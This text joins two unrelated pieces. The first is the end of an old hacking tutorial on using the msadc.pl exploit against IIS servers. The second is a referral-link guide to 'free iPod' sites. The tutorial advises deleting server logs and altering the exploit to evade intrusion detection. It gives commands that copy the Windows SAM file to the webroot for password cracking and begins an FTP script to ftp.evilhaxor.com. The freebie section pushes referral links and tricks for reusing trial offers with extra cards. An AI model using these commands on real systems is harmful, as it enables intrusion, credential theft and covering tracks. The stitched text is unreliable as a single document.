Act in the UK and probably of something similar in your own country. If it
never occurred to you to delete the contents of c:\winnt\system32\logfiles
or the 'fugscript' file then you really shouldn't be doing this.



It just wouldn't be right to talk about IIS exploitation without mentioning
msadc.pl. rfp's perl script is a perfect example of exploit chaining. A
single exploit is not used but a chain of exploits to get the script to
work.

The exploit utilises a combination of inadequate application input validation
and default install fun. The process tries to connect to a Data Source Name
(DSN) to execute commands.

rfp's script tests for the existence /msadc/msadc.dll using the GET method.
This test will be logged and you should edit the script to make it a HEAD
request and add some URL obfuscation madness.

The default msadc.pl script uses "!ADM!ROX!YOUR!WORLD!" as the MIME
separator string. It is advised to change this string as some IDS's are
configured to identify this string.

If you want to write your own scanners then you should be looking for
headers with the content type:

application/x-varg

and of course the IIS version :-) I don't want to go into too much detail
because this is heavily documented on rfp's site:

http://www.wiretrip.net/rfp/

How do I use it? I hear you cry... well, its child's play:

./msadc2.pl -h www.target.com

If all goes well then you should be presented with the following:

command:

Its interesting to note at this point that 'cmd /c' will is run as with the
previous exploit. You can edit the script to run any other executable such
as 'rdsik /s' instead.

This is good, you can know enter the command you want to run on the server.
The previous Unicode exploit should have given you some ideas but here's a
couple that come to mind:

Example 1:
copy c:\winnt\repair\sam._ c:\inetpub\wwwroot\fug.hak

(grabbing fug.hak via your browser should give you a nice file to fire up
in L0phtcrack or JTR)

Example 2:
echo open ftp.evilhaxor.com>fugscript && echo fug>>fugscript
&& echo mypassword>>fugscript... etc. etc.

Anyway, that's about all for now. When I can be bothered I'll add some more
methods to this file. Until then, ensure your box is fully patched and the
default scripts are removed. Go have a look at the following URL and get
secure:

http://www.microsoft.com/security/

***************************************************************************
Greetz to: ReDeeMeR, BarnseyBoy, Reeferman, gabbana, think12, Wang, Enstyne,
[502BOP], Muad_Dib, Macster, n0face, palmito, kph, Homicide, Col,
Axem, Booto, _Penguin, nsh, Chawmp, shad, hellz and everyone in
#CA who are way too numerous to mention.
***************************************************************************

Guide For Getting Free Stuff

If you are like me you have heard so much about the FreeIpods and FreeFlatScreens websites on different forums, blogs, IM's, etc, you are about to puke. So am I. But yet the draw of getting an Ipod for doing basically nothing is pretty strong. I dismissed all the "stories" of people getting their ipods as the marketing machine at work. However, when Kevin Rose published that not only did he receive his, but a few of his friends did as well, I figured I might take a chance and give it a go. Today I received proof that it does indeed work. Yep, I got my iPod.

Whats in it for them?
Step 1. Collect Names.
Step 2. Send those names items worth $200 or more
Step 3. ?????
Step 4. Profit

Before I signed up, I wanted to get to the bottom of the ?????. I didn't want any sweaty, filth pushing webmonkeys to have all my info, so I did my research. Gratis Internet, the parent company of the FreeIpods, FreeFlatscreens, etc. sites, recently did an interview with Wired Magazine.
In this article Gratis states that they are acting as Head Hunters for companies (more on that later) and are paid between $50-$90 per referral. Although this seems like a lot of money, this is nothing compared to what these companies spend for print advertising which does not guarentee ANY customers. So now we know what ?????? equals. ??????=$50-$90 for Gratis per guranteed customer (referral sites).

How Does it Work?
You sign-up on one (or more) of the following websites:

http://www.FreeMiniMacs.com/?r=14098976
This site gives away free Mini Macs. At the time of this writing only the 80gb MiniMac was available.

http://www.FreeDesktopPC.com/?r=13082204
This site gives away free flat screen monitors and TVs. At the time of this writing the following flat screens were available: Sony 19" LCD, Samsung 15" SyncMaster 510MP LCD TV, Samsung SyncMaster 710N LCD Monitor, Sony 27" FD Trinitron WEGA TV, or a 24" Toshiba TV/VCR/DVD combo

http://www.FreeGamingSystems.com/?r=12660654
This site gives away gaming systems. At the time of this writing the Slim PS2, Xbox, Nintendo Gamecube, and Nintendo DS were available.

http://www.FreeHandbags.com/?r=13950244
This site gives away high-end handbags. Might be a good surprise for your wife or girlfriend. =) At the time of this writing the following bags were available: Prada Mini-Hobo (black, Pink, Powder Blue), Burberry Novacheck Minisling, Coach Signature Demi Pouch (black, camel, purple), Kate Spade Pia Pochette (Black, Pink, Red)

http://www.mp3players4free.com/default.aspx?r=82419
This site gives out free mp3 players. You can get paypal $275, ipod, rio carbon, iriver, ipod mini.

http://www.dvrs4free.com/default.aspx?r=90581
This site gives away TiVo, Replay TV, and $275 paypal.

http://www.macminis4free.com/default.aspx?r=181183
Another mini mac site.

http://www.cameras4free.com/default.aspx?r=90773
This site is giving away high end digital cameras. At the the time of writing this, you follow cams are available: Canon Powershot S1 IS, Sony DSC-P100, Sony DSC-W1, Canon Powershot A95, $325 paypal.


Ok, so here is the tricky part. Once you sign up with one of these websites, you have to complete an "offer" from gratis's advertisers. There are numberous offers, some being better than others. Now remember the ???? = $50 - $90 equation? In order for you to receive your ipod/Flatscreen/Desktop PC/Handbag you have to refer 5, 8, or 10 of your friends, and they have to complete one of the offers as well. Then in order for them to receive theirs they need to refer others, and so on. So lets just look at why they are going to send an Ipod to you. (1(you) + 5(your friends)) x $90 = $540 - $250(ipod) = $290 profit for them just for you signing up. The advertisers are more than willing to pay, and FreeIpods is more than happy to send you your ipod. Works out for everyone.

What is the basic "lingo"?
"ref"/"referral" = The thing required to get your free items. These are your friends.
"green" = Status indicator that means your offer has been completed.
"yellow" = Status indicator that means your offer has yet to be completed or is in the process/pending.
"hold" = Means your account has been suspended or stopped. DON'T CHEAT.
"STV" = Means your product has been "Shipped To Vendor" You should recieve it in about 10 days time.

What process should you use to sign up (to ensure that you will get your item)
When signing up, it is recommended that you use Internet Explorer (sucks) some people have reported problems using other browsers (ex. Firefox, opera, etc.) Also make sure you have cookies accepted.

1. Click on one of the links above and enter a VALID US mailing address.

2. Complete the marketing survey - not your answers do not have any impact on you receiving your item. Just say no to them.

3. Once you have signed up, you should receive a verification email. If you did not receive one, go to the "My Account" page and click the link to have them resend it. If you still did not get it check your spam folder.

4. Sign-up with one of their partners and complete the offer. (see the section which offer should I choose) It can take up to 15 days for your offer to show completed. (A term that we freebie goers use for a "completed offer" is called "credit.") But usually they show completed after 24 hours. Be patient. If it doesn't show up as completed, you can email the site with proof and confirmation for signing up and they will give you credit.


Which offer should I choose?
Just so you know all offers require a credit card, **HOWEVER** not all of them cost anything! =) Here is a list of my recommended offers and I have not had any problems whatsover with doing these.

* Video Professor: This requires a credit card and pay only $3 shipping for computer tutorial CDs. After you receive the CDs, just call customer support and cancel your membership. Return to sender the CDs and they will refund you the shipping costs.

* Complete Home: Instant verification. Sign up for their program for $1 two month trial. You get a FREE $20 Lowes Gift Card just for doing this offer. Cancel your subscription within the 2 month trial and pay NOTHING and keep the gift card!

* Buyer's Advantage: Instant verification. Sign up for their program for $1 two month trial. You get a FREE $20 Circuit City Gift Card just for doing this offer. Cancel your subscription within the 2 month trial and pay NOTHING and keep the gift card!

* Great Fun: Instant verification. Sign up for their program for $1 two month trial. You get a FREE Walkie Talkie just for doing this offer. Cancel your subscription within the 2 month trial and pay NOTHING and keep the gift card!

* Traveler's Advantage: Instant verification. Sign up for their program for $1 two month trial. You get a FREE Thin Digital Camera just for doing this offer. Cancel your subscription within the 2 month trial and pay NOTHING and keep the gift card!

* eFax Plus: Sign up for their fax service. You get a 30 day free trial. Upon receiving credit for doing the offer, simply cancel the service within the free trial and pay nothing! It usually take 1-3 days to receive credit for this offer.

* Blockbuster Online: Try a two week trial of Blockbuster's Netflix-like service. Cancel online within trial time and pay nothing.

*Zooba: If you are a book fan, sign up for this offer. You get a book for $10 with free shipping. Instant verification.

*Various Credit Card offers: Apply for a credit card and get approved. When it arrives, cut it up and toss it out. Nothing to cancel, nothing to pay, and free stuff to gain!

Many of these offers are big companies, so you do not have to question the legitimacy for signing up under them. In other words, you will be safe because you are giving your credit card information to aol, blockbuster, and general motors, and i highly doubt that they will sell this info.

These are free, as long as you cancel within the trial period. Some offer online cancellations while others require calling their support number. Just tell them that you dont find yourself using their services enough so you want to cancel and they'll cancel your membership without any problems.

Cheating
Many of these free sites take cheating very seriously. If you want your free gift and not have you account suspended, simply DON'T CHEAT! Don't refer yourself and do all the offers yourself. If you think you can cheat the system because you are a 1337 h4x0r and you can use proxies and IP spoofs to refer yourself, DON'T DO IT. When you are in the approval stage, they will intensely throughly examine your account and make sure that all your referrels are legit and unique. Trust me, I know many people who have gotten suspended for attempting to cheat.

Multiple Accounts
This goes under cheating. It is wise not to create multiple accounts under the same site because it is against the free site's TOS. They suspend you no matter what your reason is, even if it was an accident. This also includes referring family members. You can only create one account under one household, under one IP address per site. So you cannot refer mother, sister, or brother to do it unless they live in another household.

So you've ran out of offers to do. What do I do?
Ok, if you are a freebie freak, you will probably eventually run out of offers to do because of the fact that you signed up for so many free sites did all the easy free offers. What shoud you do? Remember that free sites give you credit for a unique signup for the offers. So if you signed up for blockbuster online offer at freeflatscreens, you cannot do it again for another free site such as freedesktoppc. But there is a trick to this. A unique signup = a unique credit card that you used to sign up. So if you have a another credit card, you can sign up for the offer again. Another method is to purchase a visa gift card from your mall, or go to www.webcertificate.com and purchase a virtual debit/credit card and do the offers with those.

If you followed all these steps correctly, your free gift will be delivered to your doorstep in no time.

Here are the steps:
1. Getting friends to sign up under you
2. Approval Stage: They will analyze your account for fraud. Takes 1 week.
3. Pending Stage: Your account have been approved. You are now processing. This will take 1-2 weeks.
4. STV: Sent to Vendor. Your product will arrive in 10 days.
5. Shipped: Congrats!

Most of these freebie sites are for U.S residents only.